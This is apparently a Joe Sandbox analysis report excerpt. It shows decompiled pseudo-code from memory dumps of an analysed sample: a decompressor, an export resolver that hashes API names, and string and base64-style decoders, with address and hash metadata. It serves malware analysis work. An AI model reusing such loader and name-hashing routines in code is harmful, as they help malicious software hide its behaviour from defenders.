                          					_t138 = _t172 - (_t146 >> 0x00000002 & 0x00000007) - 1 - (( *_t191 & 0x000000ff) << 3);
                          					L57:
                          					_t60 = _t152 + 2; // 0x2
                          					_t182 = _t60;
                          					_t195 = 0;
                          					 *_t172 =  *_t138;
                          					 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t138 + 1));
                          					do {
                          						 *((char*)(_t172 + _t195 + 2)) =  *((intOrPtr*)(_t138 + _t195 + 2));
                          						_t195 = _t195 + 1;
                          					} while (_t152 != _t195);
                          					_t173 = _t172 + _t182;
                          					goto L60;
                          				}
                          				if(_t146 >= 0x20) {
                          					_t152 = _t146 & 0x0000001f;
                          					if(_t152 == 0) {
                          						_t111 =  *_t191;
                          						if(_t111 == 0) {
                          							_t160 = 0;
                          							do {
                          								_t111 = _t191[0];
                          								_t160 = _t160 + 0xff;
                          								_t191 =  &(_t191[0]);
                          							} while (_t111 == 0);
                          						}
                          						_t191 =  &(_t191[0]);
                          						_t152 = 0 + (_t111 & 0x000000ff) + 0x1f;
                          					}
                          					_t204 =  &(_t191[1]);
                          					_t138 = _t172 - (( *_t191 & 0x0000ffff) >> 2) - 1;
                          					L49:
                          					if(_t152 < 6 || _t172 - _t138 < 4) {
                          						goto L57;
                          					} else {
                          						_t185 = _t152 - 2;
                          						_t155 = _t152 + 0xfffffffa;
                          						 *_t172 =  *_t138;
                          						_t103 = _t155 & 0xfffffffc;
                          						 *_t211 = _t103;
                          						_t211[1] = _t138 + _t103 + 8;
                          						_t105 = 4;
                          						_t211[2] = _t103 + 8;
                          						do {
                          							_t185 = _t185 + 0xfffffffc;
                          							 *((intOrPtr*)(_t172 + _t105)) =  *((intOrPtr*)(_t138 + _t105));
                          							_t105 = _t105 + 4;
                          						} while (_t185 > 3);
                          						_t173 = _t172 + _t211[2];
                          						_t156 = _t155 -  *_t211;
                          						if(_t156 != 0) {
                          							_t198 = _t211[1];
                          							_t106 = 0;
                          							do {
                          								 *((char*)(_t173 + _t106)) =  *((intOrPtr*)(_t198 + _t106));
                          								_t106 = _t106 + 1;
                          							} while (_t156 != _t106);
                          							_t173 = _t173 + _t156;
                          						}
                          					}
                          					goto L60;
                          				}
                          				if(_t146 < 0x10) {
                          					_t192 =  &(_t191[0]);
                          					_t85 = _t172 - (_t146 >> 2) - 1 - (( *_t191 & 0x000000ff) << 2);
                          					 *_t172 =  *_t85;
                          					 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t85 + 1));
                          					_t173 = _t172 + 2;
                          					goto L30;
                          				}
                          				_t136 = _t172 - ((_t146 & 0x00000008) << 0xb);
                          				_t152 = _t146 & 0x00000007;
                          				if(_t152 == 0) {
                          					_t107 =  *_t191;
                          					if(_t107 == 0) {
                          						_t158 = 0;
                          						do {
                          							_t107 = _t191[0];
                          							_t158 = _t158 + 0xff;
                          							_t191 =  &(_t191[0]);
                          						} while (_t107 == 0);
                          					}
                          					_t191 =  &(_t191[0]);
                          					_t152 = 0 + (_t107 & 0x000000ff) + 7;
                          				}
                          				_t91 = _t211[8];
                          				_t184 = _t211[9] + _t91;
                          				_t137 = _t136 - (( *_t191 & 0x0000ffff) >> 2);
                          				_t204 =  &(_t191[1]);
                          				if(_t137 != _t172) {
                          					_t138 = _t137 + 0xffffc000;
                          					goto L49;
                          				}
                          				_t154 = (_t91 & 0xffffff00 | _t204 - _t184 >= 0x00000000) << 0x00000002 & 0x000000ff | 0xfffffff8;
                          				_t95 =  !=  ? _t154 : 0;
                          				 *(_t211[0xb]) = _t172 - _t211[0xa];
                          				return  !=  ? _t154 : 0;
                          				goto L66;
                          			}

                          0x005c2e6b
                          0x005c2e6f
                          0x005c2e73
                          0x005c2e79
                          0x005c2e7f
                          0x005c2e95
                          0x00000000
                          0x005c2e81
                          0x005c2e81
                          0x005c2e84
                          0x005c2e8a
                          0x005c2e99
                          0x005c2e9d
                          0x005c2ea1
                          0x005c2ea3
                          0x005c2ea7
                          0x005c2eaa
                          0x005c2eab
                          0x005c2eaf
                          0x005c2eb1
                          0x005c2f81
                          0x005c2f81
                          0x005c2f87
                          0x005c2f97
                          0x005c2fa2
                          0x005c2fa6
                          0x005c2fab
                          0x005c2fb1
                          0x005c2fb4
                          0x005c2fb7
                          0x005c2fb7
                          0x005c3102
                          0x005c3102
                          0x005c3108
                          0x005c310d
                          0x005c2eb8
                          0x005c2ebb
                          0x005c2ebb
                          0x005c2ebe
                          0x005c2ec3
                          0x00000000
                          0x005c2ec9
                          0x005c2ecb
                          0x005c2ecd
                          0x005c2ed3
                          0x005c2ed5
                          0x005c2ed7
                          0x005c2ed7
                          0x005c2eda
                          0x005c2ee0
                          0x005c2ee1
                          0x005c2ed7
                          0x005c2eeb
                          0x005c2eef
                          0x005c2eef
                          0x005c2ef5
                          0x005c2ef8
                          0x005c2ef9
                          0x005c2efb
                          0x005c2efd
                          0x005c2f00
                          0x005c2f05
                          0x005c2f08
                          0x005c2f4d
                          0x005c2f53
                          0x005c2f56
                          0x005c2f59
                          0x005c2f5c
                          0x005c2f5f
                          0x005c2f60
                          0x005c2f64
                          0x00000000
                          0x005c2f0a
                          0x005c2f0a
                          0x005c2f0d
                          0x005c2f14
                          0x005c2f1a
                          0x005c2f1c
                          0x005c2f20
                          0x005c2f27
                          0x005c2f2b
                          0x005c2f2e
                          0x005c2f31
                          0x005c2f34
                          0x005c2f37
                          0x005c2f3c
                          0x005c2f40
                          0x005c2f42
                          0x005c2f69
                          0x005c2f6d
                          0x005c2f6f
                          0x005c2f72
                          0x005c2f75
                          0x005c2f78
                          0x005c2f79
                          0x005c2f7d
                          0x005c2f7d
                          0x005c2f44
                          0x005c2f44
                          0x005c2f44
                          0x005c2f42
                          0x005c2f7f
                          0x005c2f7f
                          0x00000000
                          0x005c2f00
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005c2f89
                          0x005c2f89
                          0x005c2f89
                          0x005c2e8c
                          0x005c2e8c
                          0x005c3113
                          0x005c3113
                          0x005c3116
                          0x005c3118
                          0x005c311c
                          0x005c311f
                          0x005c3120
                          0x005c3124
                          0x005c3129
                          0x005c312b
                          0x005c2fbe
                          0x005c2fbe
                          0x005c2fbe
                          0x005c2e8a
                          0x005c2fc0
                          0x005c2fc3
                          0x005c2fd3
                          0x005c2fd4
                          0x005c2fdf
                          0x005c30e4
                          0x005c30e6
                          0x005c30e6
                          0x005c30e9
                          0x005c30eb
                          0x005c30f0
                          0x005c30f3
                          0x005c30f7
                          0x005c30fb
                          0x005c30fc
                          0x005c3100
                          0x00000000
                          0x005c3100
                          0x005c2fe9
                          0x005c2feb
                          0x005c2fee
                          0x005c2ff0
                          0x005c2ff6
                          0x005c2ff8
                          0x005c2ffa
                          0x005c2ffa
                          0x005c2ffd
                          0x005c3003
                          0x005c3004
                          0x005c2ffa
                          0x005c300b
                          0x005c300c
                          0x005c300c
                          0x005c3018
                          0x005c301f
                          0x005c3081
                          0x005c3084
                          0x00000000
                          0x005c308f
                          0x005c3091
                          0x005c3094
                          0x005c3097
                          0x005c309b
                          0x005c30a1
                          0x005c30a8
                          0x005c30ac
                          0x005c30b1
                          0x005c30b5
                          0x005c30b8
                          0x005c30bb
                          0x005c30be
                          0x005c30c1
                          0x005c30c6
                          0x005c30ca
                          0x005c30cd
                          0x005c30cf
                          0x005c30d3
                          0x005c30d5
                          0x005c30d8
                          0x005c30db
                          0x005c30dc
                          0x005c30e0
                          0x005c30e0
                          0x005c30cd
                          0x00000000
                          0x005c3084
                          0x005c3025
                          0x005c313e
                          0x005c3143
                          0x005c3147
                          0x005c314c
                          0x005c314f
                          0x00000000
                          0x005c314f
                          0x005c3035
                          0x005c3037
                          0x005c303a
                          0x005c303c
                          0x005c3042
                          0x005c3044
                          0x005c3046
                          0x005c3046
                          0x005c3049
                          0x005c304f
                          0x005c3050
                          0x005c3046
                          0x005c3057
                          0x005c3058
                          0x005c3058
                          0x005c305f
                          0x005c306a
                          0x005c306c
                          0x005c3070
                          0x005c3075
                          0x005c307b
                          0x00000000
                          0x005c307b
                          0x005c3168
                          0x005c316d
                          0x005c3174
                          0x005c317d
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cea868b4f4202321aabfc81a34691dc5411bae3e380ba442f8620b2556fde1f9
                          • Instruction ID: 16ee118a8349444ff8e044a128ef3d2f03ef39924a453e553561d401efb36a2f
                          • Opcode Fuzzy Hash: cea868b4f4202321aabfc81a34691dc5411bae3e380ba442f8620b2556fde1f9
                          • Instruction Fuzzy Hash: EDA138321083998FCB298FAC8891779BFE1BF5A314F1D86ADD8D6DB343D2249905D790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E005C36E0(intOrPtr _a4, intOrPtr _a8, char _a12) {
                          				char _v528;
                          				char _v638;
                          				char _v789;
                          				char _v1148;
                          				char _v1149;
                          				char _v1150;
                          				intOrPtr _t51;
                          				void* _t55;
                          				char* _t56;
                          				void* _t57;
                          				intOrPtr* _t58;
                          				unsigned int _t59;
                          				void* _t63;
                          				signed int _t65;
                          				void* _t68;
                          				void* _t69;
                          				char _t74;
                          				intOrPtr _t79;
                          				signed int _t80;
                          				char _t81;
                          				char* _t82;
                          				char _t83;
                          				char* _t87;
                          				char* _t91;
                          				void* _t94;
                          				short _t95;
                          				void* _t97;
                          				signed char _t99;
                          				intOrPtr* _t101;
                          				char _t102;
                          				unsigned int _t103;
                          				intOrPtr* _t107;
                          				signed int _t110;
                          				signed int _t113;
                          				intOrPtr* _t116;
                          				intOrPtr _t117;
                          				signed int _t119;
                          				void* _t120;
                          				char _t121;
                          				void* _t123;
                          				intOrPtr _t124;
                          				char* _t125;
                          				void* _t129;
                          				intOrPtr* _t130;
                          				char _t143;
                          				char _t159;
                          
                          				_t51 = _a4;
                          				_t79 = _a8;
                          				_t101 = _a12;
                          				_t124 =  *((intOrPtr*)(_t51 + 0x3c));
                          				_t117 =  *((intOrPtr*)(_t51 + _t124 + 0x78));
                          				if(_t117 > _t79 || _t117 +  *((intOrPtr*)(_t51 + _t124 + 0x7c)) <= _t79) {
                          					 *_t101 = _t51 + _t79;
                          					goto L40;
                          				} else {
                          					_t55 = _t51 + _t79;
                          					_t80 = 0;
                          					do {
                          						_t102 =  *((intOrPtr*)(_t55 + _t80));
                          						 *((char*)(_t129 + _t80 + 0x16f)) = _t102;
                          						_t80 = _t80 + 1;
                          					} while (_t102 != 0);
                          					_t125 =  &_v789;
                          					do {
                          						_t56 = _t125;
                          						_t125 = _t125 + 1;
                          					} while ( *_t56 != 0x2e);
                          					 *_t56 = 0;
                          					_t57 = 0;
                          					do {
                          						_t81 =  *((intOrPtr*)(_t129 + _t57 + 0x16f));
                          						 *((char*)(_t129 + _t57 + 6)) = _t81;
                          						_t57 = _t57 + 1;
                          					} while (_t81 != 0);
                          					_t58 =  &_v1150;
                          					_t82 =  &_v638;
                          					while( *_t58 != 0) {
                          						_t58 = _t58 + 1;
                          						if(_t58 < _t82) {
                          							continue;
                          						}
                          						break;
                          					}
                          					 *_t58 = 0x6c6c642e;
                          					 *((intOrPtr*)(_t58 + 4)) = 0;
                          					_t83 = _v1150;
                          					if(_t83 == 0) {
                          						L25:
                          						_t59 = 0;
                          						L26:
                          						_t63 = E005C35D0(((_t59 >> 0x0000000b ^ _t59) << 0xf) + (_t59 >> 0x0000000b ^ _t59));
                          						_t130 = _t129 + 4;
                          						if(_t63 != 0) {
                          							L31:
                          							_t119 =  *_t125;
                          							_t87 =  &_v1148;
                          							_t103 = 0;
                          							 *((short*)(_t87 - 2)) = 1;
                          							 *_t130 = _t87;
                          							if(_t119 == 0) {
                          								L39:
                          								_t91 =  &_v1150;
                          								 *((intOrPtr*)(_t91 + 2)) = ((_t103 >> 0x0000000b ^ _t103) << 0xf) + (_t103 >> 0x0000000b ^ _t103);
                          								_t107 = _t130;
                          								 *((short*)(_t91 + 6)) = 0;
                          								 *((intOrPtr*)(_t91 + 8)) = 0;
                          								 *_t107 = _t91;
                          								_push( &_a12);
                          								_push(_t107);
                          								_push(_t63);
                          								E005C5F90();
                          								L40:
                          								return 1;
                          							}
                          							_t94 = 0xffffffffffffffff;
                          							do {
                          								_t159 =  *((char*)(_t125 + _t94 + 2));
                          								_t94 = _t94 + 1;
                          							} while (_t159 != 0);
                          							if(_t94 + 1 <= 0) {
                          								goto L39;
                          							}
                          							_t110 = (_t119 << 0x0000000a) + _t119 >> 0x00000006 ^ (_t119 << 0x0000000a) + _t119;
                          							if(_t94 == 0) {
                          								L38:
                          								_t103 = _t110 + _t110 * 8;
                          								goto L39;
                          							}
                          							_t120 = 0;
                          							do {
                          								_t74 =  *((char*)(_t125 + _t120 + 1));
                          								_t120 = _t120 + 1;
                          								_t110 = (_t74 + _t110 << 0x0000000a) + _t74 + _t110 >> 0x00000006 ^ (_t74 + _t110 << 0x0000000a) + _t74 + _t110;
                          							} while (_t94 != _t120);
                          							goto L38;
                          						}
                          						_t65 = 0;
                          						while(1) {
                          							_t95 =  *((char*)(_t130 + _t65 + 6));
                          							 *((short*)(_t130 + 0x274 + _t65 * 2)) = _t95;
                          							if(_t95 == 0) {
                          								break;
                          							}
                          							_t65 = _t65 + 1;
                          							if(_t65 < 0x200) {
                          								continue;
                          							}
                          							break;
                          						}
                          						_t63 = E005CC6D0( &_v528);
                          						_t130 = _t130 + 4;
                          						if(_t63 == 0) {
                          							return 0;
                          						}
                          						goto L31;
                          					}
                          					_t68 = 0;
                          					do {
                          						_t143 =  *((char*)(_t129 + _t68 + 7));
                          						_t68 = _t68 + 1;
                          					} while (_t143 != 0);
                          					if(_t68 <= 0) {
                          						goto L25;
                          					}
                          					if(_t83 == 0) {
                          						L21:
                          						_t69 = _t68 - 1;
                          						_t113 = 0;
                          						_t97 = 0xffffffffffffffff;
                          						do {
                          							_t121 =  *((char*)(_t129 + _t97 + 7));
                          							_t97 = _t97 + 1;
                          							_t113 = (_t121 + _t113 << 0x0000000a) + _t121 + _t113 >> 0x00000006 ^ (_t121 + _t113 << 0x0000000a) + _t121 + _t113;
                          						} while (_t69 != _t97);
                          						_t59 = _t113 + _t113 * 8;
                          						goto L26;
                          					}
                          					_t116 =  &_v1149;
                          					_t123 = _t68;
                          					while(1) {
                          						_t99 = _t83 + 0xbf;
                          						if(_t99 <= 0x19) {
                          							 *(_t116 - 1) = _t99 | 0x00000020;
                          						}
                          						if(_t123 < 2) {
                          							goto L21;
                          						}
                          						_t83 =  *_t116;
                          						_t123 = _t123 - 1;
                          						_t116 = _t116 + 1;
                          						if(_t83 != 0) {
                          							continue;
                          						}
                          						goto L21;
                          					}
                          					goto L21;
                          				}
                          			}
                          0x005c36ea
                          0x005c36f1
                          0x005c36f8
                          0x005c36ff
                          0x005c3702
                          0x005c3708
                          0x005c37d9
                          0x00000000
                          0x005c371a
                          0x005c371a
                          0x005c371c
                          0x005c371e
                          0x005c371e
                          0x005c3721
                          0x005c3728
                          0x005c3729
                          0x005c372d
                          0x005c3734
                          0x005c3734
                          0x005c3736
                          0x005c3737
                          0x005c373c
                          0x005c373f
                          0x005c3741
                          0x005c3741
                          0x005c3748
                          0x005c374c
                          0x005c374d
                          0x005c3751
                          0x005c3755
                          0x005c375c
                          0x005c3761
                          0x005c3764
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005c3764
                          0x005c3766
                          0x005c376c
                          0x005c3773
                          0x005c3779
                          0x005c37e0
                          0x005c37e0
                          0x005c37e2
                          0x005c37f1
                          0x005c37f6
                          0x005c37fb
                          0x005c3831
                          0x005c3831
                          0x005c3834
                          0x005c3838
                          0x005c383a
                          0x005c3840
                          0x005c3845
                          0x005c388c
                          0x005c389a
                          0x005c389e
                          0x005c38a1
                          0x005c38a3
                          0x005c38a9
                          0x005c38b0
                          0x005c38b9
                          0x005c38ba
                          0x005c38bb
                          0x005c38bc
                          0x005c38c4
                          0x00000000
                          0x005c38c6
                          0x005c3849
                          0x005c384a
                          0x005c384a
                          0x005c384f
                          0x005c384f
                          0x005c3859
                          0x00000000
                          0x00000000
                          0x005c3867
                          0x005c386b
                          0x005c3889
                          0x005c3889
                          0x00000000
                          0x005c3889
                          0x005c386d
                          0x005c386f
                          0x005c386f
                          0x005c3874
                          0x005c3883
                          0x005c3885
                          0x00000000
                          0x005c386f
                          0x005c37fd
                          0x005c37ff
                          0x005c37ff
                          0x005c3807
                          0x005c380f
                          0x00000000
                          0x00000000
                          0x005c3811
                          0x005c3817
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005c3817
                          0x005c3821
                          0x005c3826
                          0x005c382b
                          0x00000000
                          0x005c38d2
                          0x00000000
                          0x005c382b
                          0x005c377b
                          0x005c377d
                          0x005c377d
                          0x005c3782
                          0x005c3782
                          0x005c3789
                          0x00000000
                          0x00000000
                          0x005c378d
                          0x005c37b2
                          0x005c37b2
                          0x005c37b3
                          0x005c37b7
                          0x005c37b8
                          0x005c37b8
                          0x005c37bd
                          0x005c37cc
                          0x005c37ce
                          0x005c37d2
                          0x00000000
                          0x005c37d2
                          0x005c378f
                          0x005c3793
                          0x005c3795
                          0x005c3797
                          0x005c379d
                          0x005c37a2
                          0x005c37a2
                          0x005c37a8
                          0x00000000
                          0x00000000
                          0x005c37aa
                          0x005c37ac
                          0x005c37ad
                          0x005c37b0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005c37b0
                          0x00000000
                          0x005c3795

                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 941cdd162d245afbbf05162c08f474f524392c1396bed88b72cf0b42da7f5da1
                          • Instruction ID: 86ba560eb96a4a743cbf818732a529e7220efc07b37f44e12aa7f450eb86b4ea
                          • Opcode Fuzzy Hash: 941cdd162d245afbbf05162c08f474f524392c1396bed88b72cf0b42da7f5da1
                          • Instruction Fuzzy Hash: 835147B16087454FE318DAA5D895B67FFE6EFC5304F18C47CD48AC7252EA35DA0A8341
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E005D41A0(char* _a4, int _a8, signed int* _a12) {
                          				signed int _v28;
                          				char _v32;
                          				intOrPtr _v36;
                          				void* _v40;
                          				signed int _v44;
                          				void* _v48;
                          				void* _v52;
                          				void* _t47;
                          				void* _t49;
                          				signed int _t62;
                          				signed int _t64;
                          				signed int _t65;
                          				signed int _t67;
                          				signed int _t70;
                          				signed int _t73;
                          				intOrPtr _t79;
                          				signed int _t83;
                          				signed int _t85;
                          				signed int _t86;
                          				intOrPtr* _t89;
                          				signed int _t90;
                          				signed int _t92;
                          				signed int _t93;
                          				void* _t94;
                          				signed int* _t95;
                          				signed int _t96;
                          				signed int _t97;
                          				void* _t99;
                          				signed int* _t100;
                          
                          				_t45 = _a4;
                          				_t73 = 0;
                          				_v48 = 0;
                          				_v52 = 0;
                          				_v40 = 0;
                          				if(_a4 == 0) {
                          					L25:
                          					return _t73;
                          				}
                          				_t47 = E005CC380(_t45, 0,  &_v40, _a8);
                          				_t99 =  &_v40 + 0x10;
                          				if(_t47 == 0) {
                          					goto L25;
                          				}
                          				_t89 =  &_v32;
                          				 *_t89 = 0x2f;
                          				_push(5);
                          				_push( &_v48);
                          				_push(_t89);
                          				_push(_v40);
                          				_t49 = E005C9FF0();
                          				_t100 = _t99 + 0x10;
                          				_t85 = 0;
                          				_t94 = _t49;
                          				_t97 = 0;
                          				_t73 = 0;
                          				if(_t49 != 5) {
                          					L12:
                          					_t50 = _v40;
                          					 *_t100 = _t85;
                          					if(_v40 != 0) {
                          						E005C91E0(_t50);
                          						_t100 =  &(_t100[1]);
                          					}
                          					if(_t94 == 0) {
                          						L17:
                          						if(_t97 == 0) {
                          							L20:
                          							_t51 = _v48;
                          							if(_v48 != 0) {
                          								E005C91E0(_t51);
                          								_t100 =  &(_t100[1]);
                          							}
                          							_t52 = _v52;
                          							_t95 = _a12;
                          							if(_v52 != 0) {
                          								E005C91E0(_t52);
                          								_t100 =  &(_t100[1]);
                          							}
                          							 *_t95 =  *_t100;
                          							goto L25;
                          						}
                          						_t96 = 0;
                          						do {
                          							E005C91E0( *((intOrPtr*)(_v52 + _t96 * 4)));
                          							_t100 =  &(_t100[1]);
                          							_t96 = _t96 + 1;
                          						} while (_t97 != _t96);
                          						goto L20;
                          					} else {
                          						_t90 = 0;
                          						do {
                          							E005C91E0( *((intOrPtr*)(_v48 + _t90 * 4)));
                          							_t100 =  &(_t100[1]);
                          							_t90 = _t90 + 1;
                          						} while (_t94 != _t90);
                          						goto L17;
                          					}
                          				}
                          				_t97 = 2;
                          				_v32 = 0xa000d;
                          				_v28 = 0;
                          				_push(2);
                          				_push( &_v52);
                          				_push(_t89);
                          				_push( *((intOrPtr*)(_v48 + 0x10)));
                          				_t62 = E005C9FF0();
                          				_t100 =  &(_t100[4]);
                          				if(_t62 != 2) {
                          					_t85 = 0;
                          					_t97 = _t62;
                          					L11:
                          					_t73 = 0;
                          					goto L12;
                          				}
                          				_t79 =  *_v52;
                          				if(_t79 == 0) {
                          					_t85 = 0;
                          					__eflags = 0;
                          					goto L11;
                          				}
                          				_t64 = 2;
                          				_t92 = 0xffffffffffffffff;
                          				while( *((short*)(_t79 + _t64 - 2)) != 0) {
                          					_t92 = _t92 - 1;
                          					_t64 = _t64 + 2;
                          					if(_t92 != 0x80000000) {
                          						continue;
                          					}
                          					_t85 = 0;
                          					_t97 = 2;
                          					goto L11;
                          				}
                          				_t73 = 0;
                          				_t97 = 2;
                          				__eflags = _t92 - 0xffffffff;
                          				if(_t92 == 0xffffffff) {
                          					_t85 = 0;
                          					goto L12;
                          				}
                          				_t65 = E005C3180(_t64, 0);
                          				_t100 =  &(_t100[2]);
                          				_t85 = _t65;
                          				__eflags = _t65;
                          				if(_t65 == 0) {
                          					goto L12;
                          				}
                          				_t67 =  ~_t92;
                          				__eflags = _t67;
                          				if(_t67 <= 0) {
                          					__eflags = _t92;
                          					if(_t92 != 0) {
                          						 *_t85 = 0;
                          					}
                          					goto L12;
                          				}
                          				_v44 = _t67;
                          				_t93 = 0;
                          				 *_t100 = _t85;
                          				_v36 =  *_v52;
                          				_t70 =  ~_t85;
                          				_t73 = 1;
                          				__eflags = 1;
                          				while(1) {
                          					_t86 =  *(_v36 + _t93 * 2) & 0x0000ffff;
                          					__eflags = _t86;
                          					if(_t86 == 0) {
                          						break;
                          					}
                          					_t70 = _t70 + 0xfffffffe;
                          					 *( *_t100 + _t93 * 2) = _t86;
                          					_t83 = _v44;
                          					__eflags = _t83 - _t73;
                          					_v44 = _t83 - 1;
                          					if(_t83 == _t73) {
                          						L33:
                          						__eflags = _v44;
                          						_t72 =  ==  ? 0xfffffffe - _t70 :  ~_t70;
                          						_t85 =  *_t100;
                          						_t73 = 0 | _v44 != 0x00000000;
                          						 *((short*)( ==  ? 0xfffffffe - _t70 :  ~_t70)) = 0;
                          						goto L12;
                          					}
                          					__eflags = _t93 - 0x7ffffffd;
                          					_t93 = _t93 + 1;
                          					if(__eflags != 0) {
                          						continue;
                          					}
                          					goto L33;
                          				}
                          				_t85 =  *_t100;
                          				 *((short*)(_t85 + _t93 * 2)) = 0;
                          				goto L12;
                          			}

                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide
                          • String ID:
                          • API String ID: 626452242-0
                          • Opcode ID: b351f703aa12de2789d53f233674a2e8121e6814b89f26de365a386e056883d4
                          • Instruction ID: b71e4a90bf743103553168c92d699bb13fca958c77898aa7b55b20067ff9582d
                          • Opcode Fuzzy Hash: b351f703aa12de2789d53f233674a2e8121e6814b89f26de365a386e056883d4
                          • Instruction Fuzzy Hash: 46515C756083029FD720DE6DC885B2BBAE5BFD4344F14892EF89987391E731D845CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005C8230() {
                          				char _t54;
                          				intOrPtr _t58;
                          				signed char _t66;
                          				void* _t67;
                          				intOrPtr _t71;
                          				signed char _t80;
                          				void* _t81;
                          				intOrPtr* _t82;
                          				signed char* _t86;
                          				intOrPtr _t87;
                          				void* _t88;
                          				void* _t91;
                          				intOrPtr _t94;
                          				signed char _t95;
                          				intOrPtr* _t98;
                          				char _t99;
                          				signed char _t103;
                          				char _t104;
                          				char _t109;
                          				signed char* _t110;
                          				void* _t112;
                          				void* _t113;
                          				void* _t114;
                          				void* _t115;
                          				char _t118;
                          
                          				_t98 =  *((intOrPtr*)(_t115 + 0x20));
                          				_t86 =  *(_t115 + 0x24);
                          				_t54 =  *_t98;
                          				_t110 = _t86;
                          				if(_t54 != 0) {
                          					_t82 =  *((intOrPtr*)(_t115 + 0x28));
                          					_t109 = 0;
                          					do {
                          						_t118 =  *((char*)(_t98 + _t109 + 1));
                          						_t109 = _t109 + 1;
                          					} while (_t118 != 0);
                          					_t110 = _t86;
                          					_t87 = 0;
                          					_t112 = 0;
                          					while(1) {
                          						 *((char*)(_t115 + _t112 + 1)) = _t54;
                          						_t112 = _t112 + 1;
                          						_t109 = _t109 - 1;
                          						if(_t112 != 4) {
                          							goto L17;
                          						}
                          						 *((intOrPtr*)(_t115 + 8)) = _t87;
                          						_t94 =  *_t82;
                          						_t114 = 0;
                          						do {
                          							if(_t94 != 0) {
                          								_t99 = 0;
                          								_t71 = _t94;
                          								while(_t71 != _t71) {
                          									_t71 =  *((intOrPtr*)(_t82 + _t99 + 1));
                          									_t99 = _t99 + 1;
                          									if(_t71 != 0) {
                          										continue;
                          									} else {
                          									}
                          									goto L13;
                          								}
                          								 *((char*)(_t115 + _t114 + 1)) = _t99;
                          							}
                          							L13:
                          							_t114 = _t114 + 1;
                          						} while (_t114 != 4);
                          						_t95 =  *(_t115 + 2);
                          						_t103 = _t95 >> 0x00000004 & 0x00000003 |  *(_t115 + 1) << 0x00000002;
                          						 *(_t115 + 5) = _t103;
                          						_t80 = ( *(_t115 + 3) << 0x00000006) +  *((intOrPtr*)(_t115 + 4)) >> 0x00000002 & 0x0000000f | _t95 << 0x00000004;
                          						 *(_t115 + 6) = _t80;
                          						 *(_t115 + 7) = _t80;
                          						_t81 = 0xfffffffe;
                          						 *_t110 = _t103;
                          						do {
                          							_t110[_t81 + 3] =  *((intOrPtr*)(_t115 + _t81 + 8));
                          							_t81 = _t81 + 1;
                          						} while (_t81 != 0);
                          						_t98 =  *((intOrPtr*)(_t115 + 0x20));
                          						_t87 =  *((intOrPtr*)(_t115 + 8));
                          						_t110 =  &(_t110[3]);
                          						_t112 = 0;
                          						L17:
                          						if(_t109 != 0) {
                          							_t87 = _t87 + 1;
                          							_t54 =  *((intOrPtr*)(_t98 + _t87));
                          							continue;
                          						}
                          						if(_t112 != 0) {
                          							if(_t112 <= 3) {
                          								E005D6610(_t115 + _t112 + 1, 0, 4 - _t112);
                          								_t115 = _t115 + 0xc;
                          							}
                          							_t88 = 0;
                          							 *((char*)(_t115 + 8)) =  *_t82;
                          							do {
                          								if( *((char*)(_t115 + 8)) != 0) {
                          									_t58 =  *((intOrPtr*)(_t115 + 8));
                          									_t104 = 0;
                          									while(_t58 != _t58) {
                          										_t58 =  *((intOrPtr*)(_t82 + _t104 + 1));
                          										_t104 = _t104 + 1;
                          										if(_t58 != 0) {
                          											continue;
                          										} else {
                          										}
                          										goto L28;
                          									}
                          									 *((char*)(_t115 + _t88 + 1)) = _t104;
                          								}
                          								L28:
                          								_t88 = _t88 + 1;
                          							} while (_t88 != 4);
                          							_t66 =  *(_t115 + 2) >> 0x00000002 >> 0x00000004 & 3 |  *(_t115 + 2) << 0x00000004 |  *(_t115 + 1) << 0x00000002;
                          							 *(_t115 + 5) = _t66;
                          							 *(_t115 + 6) = _t66;
                          							 *(_t115 + 7) = ( *(_t115 + 3) << 6) +  *((intOrPtr*)(_t115 + 4));
                          							if(_t112 >= 2) {
                          								_t48 = _t112 - 1; // -1
                          								_t91 = _t48;
                          								 *_t110 = _t66;
                          								if(_t91 != 1) {
                          									_t113 = _t112 + 0xfffffffe;
                          									_t67 = 0;
                          									do {
                          										_t110[_t67 + 1] =  *((intOrPtr*)(_t115 + _t67 + 6));
                          										_t67 = _t67 + 1;
                          									} while (_t113 != _t67);
                          								}
                          								_t110 =  &(_t110[_t91]);
                          							}
                          						}
                          						_t86 =  *(_t115 + 0x24);
                          						goto L35;
                          					}
                          				}
                          				L35:
                          				 *_t110 = 0;
                          				return _t110 - _t86;
                          			}

                          Memory Dump Source
